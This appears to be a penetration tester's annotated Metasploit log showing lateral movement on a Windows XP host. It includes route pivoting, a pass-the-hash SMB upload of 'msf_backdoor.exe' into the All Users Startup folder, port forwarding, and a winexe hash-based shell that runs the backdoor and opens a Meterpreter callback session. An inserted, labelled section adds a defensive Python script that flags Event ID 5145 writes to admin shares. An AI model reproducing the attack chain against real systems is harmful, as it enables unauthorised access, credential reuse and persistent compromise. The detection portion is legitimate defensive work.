# add a route to the 10.x network thru session 1
##################################################
msf exploit(handler) > route add 10.0.0.0 255.255.255.0 1
[*] Route added
#######################################################
# psexec wouldn't work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info
Name: SMB File Upload Utility
Module: auxiliary/admin/smb/upload_file
Version: 10394
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
LPATH                      yes       The path of the local file to upload
RHOST                      yes       The target address
RPATH                      yes       The name of the remote file relative to the share
RPORT     445              yes       Set the SMB service port
SMBSHARE  C$               yes       The name of a writeable share on the server
Description:
This module uploads a file to a target share and path. The only
reason to use this module is if your existing SMB client is not able
to support the features of the Metasploit Framework that you need,
like pass-the-hash authentication.
msf auxiliary(upload_file) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(upload_file) > set SMBPass aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
SMBPass => aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed
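Added here as a defender's counterpart to the upload above, not part of the original notes: a write through the C$ admin share into the All Users Startup folder shows up in Windows Security Event ID 5145 (Detailed File Share auditing, when enabled) as a write-access check against an administrative share. The script below works on constructed sample records in a flattened key=value layout (an assumed export format, not any particular SIEM's) and ranks Startup-folder writes highest.

```python
import re

# Constructed sample of Event ID 5145 (Detailed File Share) records, one per line
# as a SIEM export might deliver them. Made-up log lines, not output from the notes above.
SAMPLE_EVENTS = [
    "EventID=5145 SubjectUserName=Administrator IpAddress=10.0.0.5 ShareName=\\\\*\\C$ "
    "RelativeTargetName=Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe "
    "AccessMask=0x2",
    "EventID=5145 SubjectUserName=jsmith IpAddress=10.0.0.8 ShareName=\\\\*\\Shared "
    "RelativeTargetName=reports\\q1.xlsx AccessMask=0x1",
    "EventID=5145 SubjectUserName=backup IpAddress=10.0.0.9 ShareName=\\\\*\\ADMIN$ "
    "RelativeTargetName=Temp\\svc.exe AccessMask=0x2",
    "EventID=5140 SubjectUserName=jsmith IpAddress=10.0.0.8 ShareName=\\\\*\\IPC$ AccessMask=0x1",
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")   # values may contain spaces
WRITE_BITS = 0x2 | 0x4                              # FILE_WRITE_DATA / FILE_APPEND_DATA
STARTUP_MARKER = "start menu\\programs\\startup\\"  # All Users and per-user Startup paths

def parse_event(line):
    """Split a flattened key=value line into a dict."""
    return {k: v for k, v in FIELD_RE.findall(line)}

def analyze(lines):
    """Return findings for write access over administrative shares, ranked by target path."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5145":
            continue
        share = ev.get("ShareName", "").rsplit("\\", 1)[-1]
        target = ev.get("RelativeTargetName", "")
        mask = int(ev.get("AccessMask", "0x0"), 16)
        if not share.endswith("$") or not mask & WRITE_BITS:
            continue                    # read-only access or a normal user share
        if STARTUP_MARKER in target.lower():
            severity = "high"           # persistence drop into a Startup folder
        elif target.lower().endswith((".exe", ".dll", ".bat", ".vbs")):
            severity = "medium"         # executable written via an admin share
        else:
            continue
        findings.append({"severity": severity, "user": ev.get("SubjectUserName"),
                         "source": ev.get("IpAddress"), "share": share, "target": target})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['user']}@{f['source']} wrote {f['share']}\\{f['target']}")
```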
################################################
#Set up a portforward to talk to hosts via SMB
################################################
meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445
#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################
user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254
C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088
Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup
01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>
[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012